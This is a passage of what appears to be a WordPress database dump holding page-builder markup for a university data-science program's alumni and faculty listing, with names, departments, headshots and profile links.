Science<\\/span><\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/reshmanjali-guntupalli\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c405\",\"index\":1,\"id\":\"182-c409\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c410\",\"parentId\":\"182-c255\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c410\",\"index\":0,\"id\":\"182-c411\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Bronson.png\",\"caption\":{\"text\":\"\"},\"imageId\":817,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c410\",\"index\":0,\"id\":\"182-c412\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Bronson Tharpe\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c410\",\"index\":2,\"id\":\"182-c413\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/bronson-tharpe-9b754a1ba\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c410\",\"index\":1,\"id\":\"182-c414\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"}],\"id\":\"182-c255\",\"parentId\":\"182-c254\",\"partialId\":182,\"styleRef\":911,\"type\":\"content\"}],\"id\":\"182-c254\",\"parentId\":\"182-c1\",\"partialId\":182,\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Alumni\"},\"id\":\"182-c282\",\"parentId\":\"182-c281\",\"partialId\":182,\"styleRef\":926,\"type\":\"content\"}],\"id\":\"182-c281\",\"parentId\":\"182-c280\",\"partialId\":182,\"styleRef\":925,\"type\":\"content\"}],\"id\":\"182-c280\",\"parentId\":\"182-c254\",\"partialId\":182,\"styleRef\":924,\"type\":\"content\"}]},\"styleRef\":910,\"type\":\"content\"}],\"id\":\"182-c1\",\"partialId\":182,\"styleRef\":407,\"type\":\"content\"}','','','inherit','closed','closed','','562-revision-v1','','','2023-09-29 22:13:21','2023-09-30 02:13:21','',562,'https://gsudice.dataconn.net/?p=1610',0,'revision','',0),(1611,1,'2023-09-29 22:13:21','2023-09-30 02:13:21','<div data-colibri-id=\"182-c1\" class=\"style-407 style-local-182-c1 position-relative\">\n <!---->\n <div data-colibri-component=\"section\" data-colibri-id=\"182-c425\" id=\"faculty\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-970 style-local-182-c425 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <div data-colibri-id=\"182-c451\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-984 style-local-182-c451 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-985-outer style-local-182-c452-outer\">\n <div data-colibri-id=\"182-c452\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-985 style-local-182-c452 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"182-c453\" class=\"h-global-transition-all h-heading style-986 style-local-182-c453 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-986 style-local-182-c453\">\n <!---->\n <!---->\n <h2 class=\"\">Faculty</h2>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"182-c426\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-971 style-local-182-c426 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c427-outer\">\n <div data-colibri-id=\"182-c427\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c427 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"182-c428\" class=\"d-block style-973 style-local-182-c428 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-headshot.jpg\" class=\"wp-image-629 style-973-image style-local-182-c428-image\">\n <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c428-frameImage\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"182-c429\" class=\"h-global-transition-all h-heading style-974 style-local-182-c429 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-974 style-local-182-c429\">\n <!---->\n <!---->\n <h4 class=\"\">Chetan Tiwari</h4>\n </div>\n </div>\n <div data-colibri-id=\"182-c430\" class=\"h-text h-text-component style-975 style-local-182-c430 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Director</p>\n </div>\n </div>\n <div data-colibri-id=\"182-c431\" class=\"h-text h-text-component style-976 style-local-182-c431 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Geosciences</p>\n </div>\n </div>\n <div data-colibri-id=\"182-c432\" class=\"style-977 style-local-182-c432 position-relative h-element\">\n <!---->\n <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://www.linkedin.com/in/chetan-tiwari/\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://cas.gsu.edu/profile/chetan-tiwari/\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Font Awesome (https://fontawesome.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://scholar.google.com/citations?user=C5PVPkoAAAAJ&hl=en\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c433-outer\">\n <div data-colibri-id=\"182-c433\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c433 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"182-c434\" class=\"d-block style-978 style-local-182-c434 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-Portrait-1.jpeg\" class=\"wp-image-1409 style-978-image style-local-182-c434-image\">\n <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-978-frameImage style-local-182-c434-frameImage\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"182-c435\" class=\"h-global-transition-all h-heading style-974 style-local-182-c435 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-974 style-local-182-c435\">\n <!---->\n <!---->\n <h4 class=\"\">Armin Mikler</h4>\n </div>\n </div>\n <div data-colibri-id=\"182-c436\" class=\"h-text h-text-component style-975 style-local-182-c436 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p> Chair and Professor\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"182-c437\" class=\"h-text h-text-component style-976 style-local-182-c437 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Computer Science\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"182-c438\" class=\"style-979 style-local-182-c438 position-relative h-element\">\n <!---->\n <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://cas.gsu.edu/profile/armin-mikler/\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://cas.gsu.edu/profile/armin-mikler/\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Font Awesome (https://fontawesome.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://scholar.google.com/citations?user=41ckZZsAAAAJ&hl=en\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c439-outer\">\n <div data-colibri-id=\"182-c439\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c439 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"182-c440\" class=\"d-block style-980 style-local-182-c440 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-sunderraman1.jpeg\" class=\"wp-image-702 style-980-image style-local-182-c440-image\">\n <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm 